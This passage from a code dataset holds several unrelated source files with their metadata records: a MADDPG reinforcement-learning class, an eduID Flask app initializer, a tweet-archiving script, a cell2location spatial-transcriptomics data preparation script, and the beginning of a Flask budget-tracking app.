bbox_anchor='tight')\n plt.gcf().clear()\n", "sub_path": "accessibility.py", "file_name": "accessibility.py", "file_ext": "py", "file_size_in_byte": 8997, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "shapely.geometry.Point", "line_number": 41, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 44, "usage_type": "call"}, {"api_name": "osmnx.graph_from_bbox", "line_number": 83, "usage_type": "call"}, {"api_name": "osmnx.gdf_from_place", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "osmnx.plot_graph", "line_number": 103, "usage_type": "call"}, {"api_name": "shapely.geometry.Polygon", "line_number": 107, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 107, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 108, "usage_type": "argument"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 109, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 111, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "pandana.Network", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 160, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 181, "usage_type": "call"}, {"api_name": 
"shapely.geometry.Point", "line_number": 185, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 186, "usage_type": "call"}, {"api_name": "shapely.geometry.Polygon", "line_number": 193, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 193, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 194, "usage_type": "argument"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 195, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 210, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 210, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 211, "usage_type": "argument"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 212, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}]}
+{"seq_id": "80307178", "text": "# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2020 SUNET\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or\n# without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# 3. Neither the name of the SUNET nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n\nfrom typing import Dict, cast\n\nfrom flask import current_app\n\nfrom eduid_common.api import mail_relay, translation\nfrom eduid_common.authn.middleware import AuthnBaseApp\nfrom eduid_common.config.exceptions import BadConfiguration\nfrom eduid_scimapi.groupdb import ScimApiGroupDB\nfrom eduid_scimapi.userdb import ScimApiUserDB\nfrom eduid_userdb.group_management import GroupManagementInviteStateDB\n\nfrom eduid_webapp.group_management.settings.common import GroupManagementConfig\n\n__author__ = 'lundberg'\n\n\nclass GroupManagementApp(AuthnBaseApp):\n def __init__(self, name: str, config: dict, **kwargs):\n # Initialise type of self.config before any parent class sets a precedent to mypy\n self.config = GroupManagementConfig.init_config(ns='webapp', app_name=name, test_config=config)\n super().__init__(name, **kwargs)\n # cast self.config because sometimes mypy thinks it is a FlaskConfig after super().__init__()\n self.config: GroupManagementConfig = cast(GroupManagementConfig, self.config) # type: ignore\n\n # Init dbs\n if self.config.mongo_uri is None:\n raise BadConfiguration('mongo_uri not set')\n self.invite_state_db = GroupManagementInviteStateDB(self.config.mongo_uri)\n _owner = self.config.scim_data_owner.replace(\n '.', '_'\n ) # dot is a name separator in mongodb, so replace dots with underscores\n self.scimapi_userdb = ScimApiUserDB(db_uri=self.config.mongo_uri, collection=f'{_owner}__users')\n self.scimapi_groupdb = ScimApiGroupDB(\n neo4j_uri=self.config.neo4j_uri,\n neo4j_config=self.config.neo4j_config,\n scope=self.config.scim_data_owner,\n mongo_uri=self.config.mongo_uri,\n mongo_dbname='eduid_scimapi',\n mongo_collection=f'{_owner}__groups',\n )\n # Init celery\n mail_relay.init_relay(self)\n\n # Init translation\n translation.init_babel(self)\n\n\ncurrent_group_management_app = cast(GroupManagementApp, current_app)\n\n\ndef init_group_management_app(name: str, config: Dict) -> 
GroupManagementApp:\n \"\"\"\n :param name: The name of the instance, it will affect the configuration loaded.\n :param config: any additional configuration settings. Specially useful\n in test cases\n\n :return: the flask app\n \"\"\"\n app = GroupManagementApp(name, config)\n\n # Register views\n from eduid_webapp.group_management.views.group import group_management_views\n from eduid_webapp.group_management.views.invite import group_invite_views\n\n app.register_blueprint(group_management_views)\n app.register_blueprint(group_invite_views)\n\n app.logger.info('{!s} initialized'.format(name))\n return app\n", "sub_path": "src/eduid_webapp/group_management/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4351, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "eduid_common.authn.middleware.AuthnBaseApp", "line_number": 50, "usage_type": "name"}, {"api_name": "eduid_webapp.group_management.settings.common.GroupManagementConfig.init_config", "line_number": 53, "usage_type": "call"}, {"api_name": "eduid_webapp.group_management.settings.common.GroupManagementConfig", "line_number": 53, "usage_type": "name"}, {"api_name": "eduid_webapp.group_management.settings.common.GroupManagementConfig", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 56, "usage_type": "call"}, {"api_name": "eduid_common.config.exceptions.BadConfiguration", "line_number": 60, "usage_type": "call"}, {"api_name": "eduid_userdb.group_management.GroupManagementInviteStateDB", "line_number": 61, "usage_type": "call"}, {"api_name": "eduid_scimapi.userdb.ScimApiUserDB", "line_number": 65, "usage_type": "call"}, {"api_name": "eduid_scimapi.groupdb.ScimApiGroupDB", "line_number": 66, "usage_type": "call"}, {"api_name": "eduid_common.api.mail_relay.init_relay", "line_number": 75, "usage_type": "call"}, {"api_name": "eduid_common.api.mail_relay", "line_number": 75, "usage_type": "name"}, {"api_name": "eduid_common.api.translation.init_babel", "line_number": 78, "usage_type": "call"}, {"api_name": "eduid_common.api.translation", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.current_app", "line_number": 81, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 84, "usage_type": "name"}, {"api_name": "eduid_webapp.group_management.views.group.group_management_views", "line_number": 98, "usage_type": "argument"}, {"api_name": "eduid_webapp.group_management.views.invite.group_invite_views", "line_number": 99, "usage_type": "argument"}]}
+{"seq_id": "534435687", "text": "# main code that contains the neural network setup\n# policy + critic updates\n# see ddpg.py for other details in the network\n\nfrom ddpg import DDPGAgent\nimport torch\nfrom utilities import soft_update, transpose_to_tensor, transpose_list\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#device = 'cpu'\nimport numpy as np\nimport pdb\n\nDISCOUNT_FACTOR = 0.95 \nTAU = 0.02\n\ndef reshape_sample(vec3):\n ns, nm, ni = vec3.shape\n return vec3.reshape(nm, ns, ni)\n\ndef transpose_to_tensor(input_list):\n make_tensor = lambda x: torch.tensor(x, device = device, dtype=torch.float)\n return list(map(make_tensor, zip(*input_list)))\n\nclass MADDPG:\n #def __init__(self, agents_archs):\n def __init__(self, state_size, obs_size, action_size, num_agents):\n super(MADDPG, self).__init__()\n\n #self.maddpg_agent = [DDPGAgent(14, 16, 8, 2, \n #20, 32, 16), \n #DDPGAgent(14, 16, 8, 2, \n #20, 32, 16)]\n #self.maddpg_agent = [DDPGAgent(in_actor=x[\"in_actor\"], hidden_in_actor=x[\"hidden_in_actor\"], \n #hidden_out_actor=x[\"hidden_out_actor\"], out_actor=x[\"out_actor\"],\n #in_critic=x[\"in_critic\"], hidden_in_critic=x[\"hidden_in_critic\"], \n #hidden_out_critic=x[\"hidden_out_critic\"], \n #lr_actor=x[\"lr_actor\"], lr_critic=x[\"lr_critic\"]) for x in agents_archs]\n \n self.maddpg_agent = [DDPGAgent(state_size, obs_size, action_size, num_agents) for x in range(num_agents)]\n \n self.discount_factor = DISCOUNT_FACTOR\n self.tau = TAU\n self.iter = 0\n\n def get_actors(self):\n \"\"\"get actors of all the agents in the MADDPG object\"\"\"\n actors = [ddpg_agent.actor for ddpg_agent in self.maddpg_agent]\n return actors\n def get_critics(self):\n \"\"\"get actors of all the agents in the MADDPG object\"\"\"\n actors = [ddpg_agent.critic for ddpg_agent in self.maddpg_agent]\n return actors\n\n def get_target_actors(self):\n \"\"\"get target_actors of all the agents in the MADDPG object\"\"\"\n target_actors = [ddpg_agent.target_actor for ddpg_agent in self.maddpg_agent]\n return target_actors\n\n def act(self, obs_all_agents, noise=0.0):\n \"\"\"get actions from all agents in the MADDPG object\"\"\"\n actions = [agent.act(obs, noise) for agent, obs in zip(self.maddpg_agent, obs_all_agents)]\n return actions\n\n def target_act(self, obs_all_agents, noise=0.0):\n \"\"\"get target network actions from all the agents in the MADDPG object \"\"\"\n target_actions = [ddpg_agent.target_act(obs, noise) for ddpg_agent, obs in zip(self.maddpg_agent, obs_all_agents)]\n return target_actions\n \n\n #def update(self, samples, agent_number, logger):\n def update(self, samples, agent_number):\n \"\"\"update the critics and actors of all the agents \"\"\"\n\n # need to transpose each element of the samples\n # to flip obs[parallel_agent][agent_number] to\n # obs[agent_number][parallel_agent]\n obs, obs_full, action, reward, next_obs, next_obs_full, done = map(transpose_to_tensor, samples)\n #obs, obs_full, action, reward, next_obs, next_obs_full, done = samples\n #obs, action, reward, next_obs, done = map(transpose_to_tensor, [obs, action, reward, next_obs, done])\n #obs_full = torch.from_numpy( obs_full ).float().to(device)\n #next_obs_full = torch.from_numpy( next_obs_full ).float().to(device)\n\n obs_full = torch.stack(obs_full)\n next_obs_full = torch.stack(next_obs_full)\n \n agent = self.maddpg_agent[agent_number]\n agent.critic_optimizer.zero_grad()\n\n #critic loss = batch mean of (y- Q(s,a) from target network)^2\n #y = reward of this timestep + 
discount * Q(st+1,at+1) from target network\n target_actions = self.target_act(next_obs)\n #pdb.set_trace() #########################################################################################\n target_actions = torch.cat(target_actions, dim=1)\n #pdb.set_trace() #########################################################################################\n \n #target_critic_input = torch.cat((next_obs_full.t(),target_actions), dim=1).to(device)\n \n with torch.no_grad():\n #q_next = agent.target_critic(target_critic_input)\n q_next = agent.target_critic(next_obs_full.t(), target_actions)\n \n y = reward[agent_number].view(-1, 1) + self.discount_factor * q_next * (1 - done[agent_number].view(-1, 1))\n action = torch.cat(action, dim=1)\n #critic_input = torch.cat((obs_full.t(), action), dim=1).to(device)\n #q = agent.critic(critic_input)\n q = agent.critic(obs_full.t(), action)\n\n huber_loss = torch.nn.SmoothL1Loss()\n critic_loss = huber_loss(q, y.detach())\n critic_loss.backward()\n #torch.nn.utils.clip_grad_norm_(agent.critic.parameters(), 0.5)\n agent.critic_optimizer.step()\n\n #update actor network using policy gradient\n agent.actor_optimizer.zero_grad()\n # make input to agent\n # detach the other agents to save computation\n # saves some time for computing derivative\n q_input = [ self.maddpg_agent[i].actor(ob) if i == agent_number \\\n else self.maddpg_agent[i].actor(ob).detach()\n for i, ob in enumerate(obs) ]\n \n q_input = torch.cat(q_input, dim=1)\n # combine all the actions and observations for input to critic\n # many of the obs are redundant, and obs[1] contains all useful information already\n #q_input2 = torch.cat((obs_full.t(), q_input), dim=1)\n \n # get the policy gradient\n #actor_loss = -agent.critic(q_input2).mean()\n actor_loss = -agent.critic(obs_full.t(), q_input).mean()\n actor_loss.backward()\n #torch.nn.utils.clip_grad_norm_(agent.actor.parameters(),0.5)\n agent.actor_optimizer.step()\n\n\n def update_targets(self):\n \"\"\"soft update targets\"\"\"\n self.iter += 1\n for ddpg_agent in self.maddpg_agent:\n soft_update(ddpg_agent.target_actor, ddpg_agent.actor, self.tau)\n soft_update(ddpg_agent.target_critic, ddpg_agent.critic, self.tau)\n \n \n \n\n\n\n\n", "sub_path": "maddpg.py", "file_name": "maddpg.py", "file_ext": "py", "file_size_in_byte": 6521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.device", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 21, "usage_type": "attribute"}, {"api_name": "ddpg.DDPGAgent", "line_number": 39, "usage_type": "call"}, {"api_name": "utilities.transpose_to_tensor", "line_number": 77, "usage_type": "argument"}, {"api_name": "torch.stack", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.SmoothL1Loss", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 123, "usage_type": "call"}, {"api_name": 
"utilities.soft_update", "line_number": 140, "usage_type": "call"}, {"api_name": "utilities.soft_update", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "638152831", "text": "#!/usr/bin/env python\n# encoding: utf-8\n# This code has been adapted from https://gist.github.com/yanofsky/5436496\n\nimport sys\nimport tweepy # https://github.com/tweepy/tweepy\nimport csv\nimport api_keys\nimport xlsxwriter\nimport tweet_cleaner\n\n\ndef get_all_tweets(screen_name):\n # Twitter only allows access to a users most recent 3240 tweets with this method\n\n # authorize twitter, initialize tweepy\n if api_keys.consumer_key == '' or api_keys.consumer_secret == '' \\\n or api_keys.access_token == '' or api_keys.access_secret == '':\n print(\"API key not found. Please check api_keys.py file\")\n sys.exit(-1)\n auth = tweepy.OAuthHandler(api_keys.consumer_key, api_keys.consumer_secret)\n auth.set_access_token(api_keys.access_token, api_keys.access_secret)\n api = tweepy.API(auth)\n\n # initialize a list to hold all the tweepy Tweets\n alltweets = []\n\n # make initial request for most recent tweets (200 is the maximum allowed count)\n new_tweets = api.user_timeline(screen_name=screen_name, count=200)\n\n # save most recent tweets\n alltweets.extend(new_tweets)\n\n # save the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n # keep grabbing tweets until there are no tweets left to grab\n while len(new_tweets) > 0:\n print(\"getting tweets before {}\".format(oldest))\n\n # all subsiquent requests use the max_id param to prevent duplicates\n new_tweets = api.user_timeline(screen_name=screen_name, count=200, max_id=oldest)\n\n # save most recent tweets\n alltweets.extend(new_tweets)\n\n # update the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n print(\"...{} tweets downloaded so far\".format((len(alltweets))))\n #print('all tweets\\n', alltweets)\n #print('first tweet:', alltweets[0])\n # transform the tweepy tweets into a 2D array that will populate the csv\n outtweets = [[tweet.id_str, tweet.created_at.strftime('%m/%d/%Y'), tweet.text.encode(\"utf-8\").decode('utf-8')] for tweet in alltweets]\n outtweetsDict = [{'id': tweet.id_str, 'created_at': tweet.created_at.strftime('%m/%d/%Y'), 'text': tweet.text.encode(\"utf-8\").decode('utf-8')} for\n tweet in alltweets]\n #print('first outtweets:', outtweets[0])\n\n # write the csv\n with open('%s_tweets.csv' % screen_name, 'w') as csvfile:\n fieldnames = [\"id\", \"created_at\", \"text\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')\n writer.writeheader()\n writer.writerows(outtweetsDict)\n\n workbook = xlsxwriter.Workbook('%s_tweets.xlsx' % screen_name)\n worksheet = workbook.add_worksheet()\n # Start from the first cell. 
Rows and columns are zero indexed.\n row = 0\n col = 0\n worksheet.write(row, 0, 'id')\n worksheet.write(row, 1, 'created_at')\n worksheet.write(row, 2, 'original_text')\n worksheet.write(row, 3, 'clean_text')\n row += 1\n for tid, tdate, text in outtweets:\n clean_text = tweet_cleaner.clean_tweet(text)\n clean_text = tweet_cleaner.normalize_arabic(clean_text)\n clean_text = tweet_cleaner.remove_repeating_char(clean_text)\n clean_text = tweet_cleaner.keep_only_arabic(clean_text.split())\n worksheet.write(row, col, tid)\n worksheet.write(row, col + 1, tdate)\n worksheet.write(row, col + 2, text)\n worksheet.write(row, col + 3, clean_text)\n row += 1\n workbook.close()\n\nif __name__ == '__main__':\n # pass in the username of the account you want to download\n get_all_tweets(\"Motaz_K_Saad\")\n", "sub_path": "user_tweets_history.py", "file_name": "user_tweets_history.py", "file_ext": "py", "file_size_in_byte": 3583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "api_keys.consumer_key", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api_keys.consumer_secret", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api_keys.access_token", "line_number": 18, "usage_type": "attribute"}, {"api_name": "api_keys.access_secret", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 20, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "api_keys.consumer_key", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api_keys.consumer_secret", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api_keys.access_token", "line_number": 22, "usage_type": "attribute"}, {"api_name": "api_keys.access_secret", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tweepy.API", "line_number": 23, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 62, "usage_type": "call"}, {"api_name": "xlsxwriter.Workbook", "line_number": 66, "usage_type": "call"}, {"api_name": "tweet_cleaner.clean_tweet", "line_number": 77, "usage_type": "call"}, {"api_name": "tweet_cleaner.normalize_arabic", "line_number": 78, "usage_type": "call"}, {"api_name": "tweet_cleaner.remove_repeating_char", "line_number": 79, "usage_type": "call"}, {"api_name": "tweet_cleaner.keep_only_arabic", "line_number": 80, "usage_type": "call"}]}
+{"seq_id": "225918836", "text": "import sys\nimport os\n\nimport scanpy as sc\nimport anndata\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nimport cell2location\nfrom cell2location.utils.filtering import filter_genes\n\nfrom matplotlib import rcParams\nrcParams['pdf.fonttype'] = 42 # enables correct plotting of text\nimport seaborn as sns\n\nimport pyhere\nfrom pathlib import Path\nfrom PIL import Image\nimport json\n\n################################################################################\n# Variable definitions\n################################################################################\n\ncell_group = \"layer\" # \"broad\" or \"layer\"\n\n\nsc_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"05-shared_utilities\",\n \"sce_\" + cell_group + \".h5ad\"\n)\nsp_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"05-shared_utilities\", \"nonIF\", \"spe.h5ad\"\n)\n\nprocessed_dir = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"03-cell2location\", \"nonIF\", cell_group\n)\nplot_dir = pyhere.here(\n \"plots\", \"spot_deconvo\", \"03-cell2location\", \"nonIF\", cell_group\n)\nPath(plot_dir).mkdir(parents=True, exist_ok=True)\nPath(processed_dir).mkdir(parents=True, exist_ok=True)\n\n# Directory containing hires image and a JSON containing scale factors and\n# spot size for a given sample. Here '{}' will be replaced by a single\n# sample name\nspaceranger_dir = pyhere.here(\n 'processed-data', 'rerun_spaceranger', '{}', 'outs', 'spatial'\n)\n\nmarker_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"05-shared_utilities\",\n \"markers_\" + cell_group + \".txt\"\n)\n\nsample_info_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"nonIF_ID_table.csv\"\n)\n\n# In single-cell only\nif cell_group == 'broad':\n cell_type_var = 'cellType_broad_hc'\nelse:\n cell_type_var = 'layer_level'\n\n# Naming conventions used for different columns in the spatial AnnData\nsample_id_var = 'sample_id' # in spatial object only\nensembl_id_var = 'gene_id' # in both spatial and single-cell objects\ngene_symbol_var = 'gene_name' # in both spatial and single-cell objects\nspatial_coords_names = ['pxl_col_in_fullres', 'pxl_row_in_fullres']\n\nplot_file_type = 'pdf'\n\n################################################################################\n# Preprocessing\n################################################################################\n\n# Load AnnDatas\nprint('Loading AnnDatas...')\nadata_vis = sc.read_h5ad(sp_path)\nadata_ref = sc.read_h5ad(sc_path)\n\nadata_vis.obs['sample'] = adata_vis.obs[sample_id_var]\n\n# Different naming conventions are used between sample IDs in adata_vis vs. in\n# file paths for spaceranger files. Compute the corresponding spaceranger IDs\nsample_info = pd.read_csv(sample_info_path)\n\n# rename genes to ENSEMBL\nadata_vis.var['SYMBOL'] = adata_vis.var[gene_symbol_var]\nadata_vis.var_names = adata_vis.var[ensembl_id_var]\nadata_vis.var_names.name = None\n\n# find mitochondria-encoded (MT) genes\nadata_vis.var['MT_gene'] = [\n gene.startswith('MT-') for gene in adata_vis.var['SYMBOL']\n]\n\n# remove MT genes for spatial mapping (keeping their counts in the object).\nadata_vis.obsm['MT'] = adata_vis[:, adata_vis.var['MT_gene'].values].X.toarray()\nadata_vis = adata_vis[:, ~adata_vis.var['MT_gene'].values]\n\n# Spatial AnnData needs unique indices. 
Rather than using barcode (repeated\n# for every sample), use \"key\" (barcode + sample ID)\nadata_vis.obs_names = adata_vis.obs['key']\nadata_vis.obs_names.name = None\n\n# Use ENSEMBL as gene IDs to make sure IDs are unique and correctly matched\nadata_ref.var['SYMBOL'] = adata_ref.var[gene_symbol_var]\nadata_ref.var.index = adata_ref.var[ensembl_id_var]\nadata_ref.var_names = adata_ref.var[ensembl_id_var]\nadata_ref.var.index.name = None\n\n# Subset to marker genes\nwith open(marker_path, 'r') as f:\n selected = f.read().splitlines()\n\nadata_ref = adata_ref[:, selected].copy()\n\n#-------------------------------------------------------------------------------\n# Attach hi-res images and scaleFactors to spatial AnnData\n#-------------------------------------------------------------------------------\n\nadata_vis.uns['spatial'] = {}\n\nfor sample_id in adata_vis.obs['sample'].cat.categories:\n spaceranger_id = sample_info[\n sample_info['short_id'] == sample_id\n ]['long_id'].values[0]\n \n # Path to JSON from spaceranger including spot size for this sample\n json_path = pyhere.here(\n str(spaceranger_dir).format(spaceranger_id), 'scalefactors_json.json'\n )\n \n with open(json_path) as f: \n json_data = json.load(f)\n \n # Read in high-res image as numpy array with values in [0, 1] rather than\n # [0, 255], then attach to AnnData object\n img_path = str(\n pyhere.here(\n str(spaceranger_dir).format(spaceranger_id),\n 'tissue_hires_image.png'\n )\n )\n img_arr = np.array(Image.open(img_path), dtype = np.float32) / 256\n \n # Store image and scalefactors in AnnData as squidpy expects\n adata_vis.uns['spatial'][sample_id] = {\n 'scalefactors': json_data,\n 'images' : { 'hires' : img_arr }\n }\n\n#-------------------------------------------------------------------------------\n# Attach spatialCoords to spatial AnnData\n#-------------------------------------------------------------------------------\n\n# Correct how spatialCoords are stored. Currently, they are a pandas\n# DataFrame, with the columns potentially in the wrong order (depending on the\n# version of SpatialExperiment used in R). 
We need them as a numpy array.\nadata_vis.obsm['spatial'] = np.array(\n adata_vis.obsm['spatial'][spatial_coords_names]\n)\n\n#-------------------------------------------------------------------------------\n# Replace special characters in some layer groups\n#-------------------------------------------------------------------------------\n\nif cell_group == \"layer\":\n adata_ref.obs[cell_type_var] = pd.Series(\n [x.replace('/', '_') for x in adata_ref.obs[cell_type_var]],\n dtype = 'category', index = adata_ref.obs_names\n )\n\n#-------------------------------------------------------------------------------\n# Save AnnDatas\n#-------------------------------------------------------------------------------\n\nif cell_group == 'broad':\n adata_vis.write_h5ad(\n os.path.join(os.path.dirname(processed_dir), 'adata_vis_orig.h5ad')\n )\n\nadata_ref.write_h5ad(\n os.path.join(processed_dir, 'adata_ref_orig.h5ad')\n)\n", "sub_path": "code/spot_deconvo/03-cell2location/01-prepare_anndata_nonIF.py", "file_name": "01-prepare_anndata_nonIF.py", "file_ext": "py", "file_size_in_byte": 6474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "matplotlib.rcParams", "line_number": 15, "usage_type": "name"}, {"api_name": "pyhere.here", "line_number": 30, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 34, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 38, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 41, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 44, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 50, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 54, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 59, "usage_type": "call"}, {"api_name": "scanpy.read_h5ad", "line_number": 83, "usage_type": "call"}, {"api_name": "scanpy.read_h5ad", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 135, "usage_type": "call"}, {"api_name": "json.load", "line_number": 140, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}]}
+{"seq_id": "261898025", "text": "from flask import Flask, session, redirect, url_for, escape, request, render_template, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import and_\nfrom sqlalchemy import func\nfrom sqlalchemy import exc\nimport json\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///budget.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\napp.secret_key = \"this is a terrible secret key\"\n\n\n##########################################\n####////MODELS----MODELS----MODELS\\\\\\\\####\n##########################################\n\nclass Category(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(30), nullable=False, unique=True)\n limit = db.Column(db.Integer, nullable=False)\n\n def __init__(self, name, limit):\n self.name = name\n self.limit = limit\n\n def __repr__(self):\n return '' % (self.id, self.name, self.limit)\n\n def as_dict(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"limit\": self.limit\n }\n\n\nclass Purchase(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n cat_id = db.Column(db.Integer, db.ForeignKey('category.id'), nullable=False)\n name = db.Column(db.String(30), nullable=False)\n cost = db.Column(db.Integer, nullable=False)\n date = db.Column(db.String(10), nullable=False)\n\n def __init__(self, cat_id, name, cost, date):\n self.cat_id = cat_id\n self.name = name\n self.cost = cost\n self.date = date\n\n def __repr__(self):\n return '' % (self.id, self.cat_id, self.name, self.cost, self.date)\n\n def as_dict(self):\n return {\n \"id\": self.id,\n \"cat_id\": self.cat_id,\n \"name\": self.name,\n \"cost\": self.cost,\n \"date\": self.date\n }\n\n#########################################################\n####////CONTROLLERS----CONTROLLERS----CONTROLLERS\\\\\\\\####\n#########################################################\n\n@app.cli.command('initdb')\ndef initdb_command():\n db.drop_all()\n db.create_all()\n\n default_cat = 